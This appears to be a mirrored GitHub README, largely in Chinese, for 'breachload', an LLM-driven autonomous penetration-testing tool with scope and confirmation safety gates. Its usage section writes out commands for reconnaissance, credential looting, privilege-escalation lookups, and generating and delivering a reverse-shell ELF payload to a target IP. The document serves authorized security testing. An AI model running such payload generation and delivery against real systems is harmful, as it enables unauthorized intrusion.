Noxiidus/breachload

GitHub: Noxiidus/breachload

一款适用于 Linux 的自主渗透测试 Copilot,通过确定性安全层与 LLM 决策相结合,自动化驱动从侦察到报告的完整渗透测试流程。

Stars: 0 | Forks: 0

# breachload 适用于 Linux 的自主渗透测试 Copilot。引导从侦察到报告的整个测试过程: 运行工具,将其输出解析为结构化状态,决定下一步操作, 并生成工作笔记和发现结果 —— 同时通过确定性的安全层确保 每个操作都在授权范围内进行。 ## 设计 - **确定性核心,LLM 负责决策。** 解析、状态和范围均由代码控制。 模型(Claude)仅决定下一步操作并解释原因。它绝不 解析原始输出,也绝不绕过安全层。 - **结构化状态,而非聊天历史。** 每台主机 / 服务 / 凭证 / 发现结果都是类型化的记录(`core/state.py`),可查询且可复现。 - **安全层是全自动化的支柱**(`safety/`):范围允许列表、 命令验证(二进制程序允许列表 + 无 shell 元字符),以及 风险分类器,该分类器会在执行侵入性/漏洞利用/破坏性操作时强制要求确认。 - **支持离线运行。** 在没有 `ANTHROPIC_API_KEY` 的情况下,启发式规划器仍可端到端地驱动 侦察,因此无需 API 即可对 pipeline 进行测试。 ## 布局 ``` breachload/ core/ orchestrator, state, config, llm planner, phases safety/ scope, validator, audit tools/ adapters (run + parse -> struct); nmap is the reference analysis/ cve mapping, cross-service correlation (planned) analysis/ version->CVE mapping, correlator, rule-based suggestion engine exploit/ payload generation + delivery + offline payload library data/ vuln knowledge base + offline payload/technique library report/ findings -> markdown / pdf web/ FastAPI + WebSocket dashboard (on_event seam) engagements/ per-engagement scope + state + audit log ``` ## 使用方法 ``` pip install -e . # add [web] for the dashboard: pip install -e '.[web]' export ANTHROPIC_API_KEY=... # optional; omit for offline heuristic mode breachload auto engagements/example.yaml # one shot: recon -> plan -> report breachload run engagements/example.yaml # auto-chain recon -> enum -> vuln breachload status engagements/example.yaml # current known state breachload suggest engagements/example.yaml # rule-based next steps (no API key) breachload payloads --tag smb # browse the offline payload library breachload gtfo find # offline GTFOBins privesc lookup breachload loot engagements/example.yaml --scan linpeas.txt # privesc + creds from shell loot breachload doctor # which tools/wordlists are installed breachload flag engagements/example.yaml --scan loot/user.txt # capture a flag breachload report engagements/example.yaml --pdf # Markdown (+ PDF) report breachload serve engagements/example.yaml # run with a live web dashboard # Exploitation(离线生成不受限制;delivery 经确认门控) breachload payload engagements/example.yaml --payload linux/x64/shell_reverse_tcp \ --lhost 10.10.14.9 --lport 4444 --fmt elf breachload deliver engagements/example.yaml --artifact --target 10.10.10.5 ``` 请参阅 [WALKTHROUGH.md](WALKTHROUGH.md) 获取从头到尾的完整靶机演练。通过 `breachload kb-import` 从 NVD 订阅源扩充 CVE KB,并通过 `breachload.tools` entry-point 组添加您自己的扫描器(详见演练文档)。 ## 自主性与安全层 测试任务 YAML 中的 `auto_threshold` 设置了在全自动模式下 无需询问即可运行的内容。侦察/枚举自动执行;任何被验证器 归类为高于阈值的操作(暴力破解、sqlmap 数据导出、exploit 执行) 都会暂停并等待确认。安全层管控操作落在**何处**以及**何时** 需要人工介入 —— 它不限制分析、payload 构造或 exploit 开发。 ## 路线图 1. ~~脚手架:state + safety + nmap adapter + advisor loop~~ 2. Adapter:whatweb, ffuf, nuclei, enum4linux-ng 3. 分析:version→CVE 映射、跨服务关联器 4. 带有确认门控的全自动化;紧急停止开关 5. 报告引擎 6. CTF 模式(激进的默认设置,flag 检测,轻量级报告)
标签:AV绕过, FastAPI, Python, XXE攻击, 实时处理, 密码管理, 插件系统, 无后门, 自动化红队, 逆向工具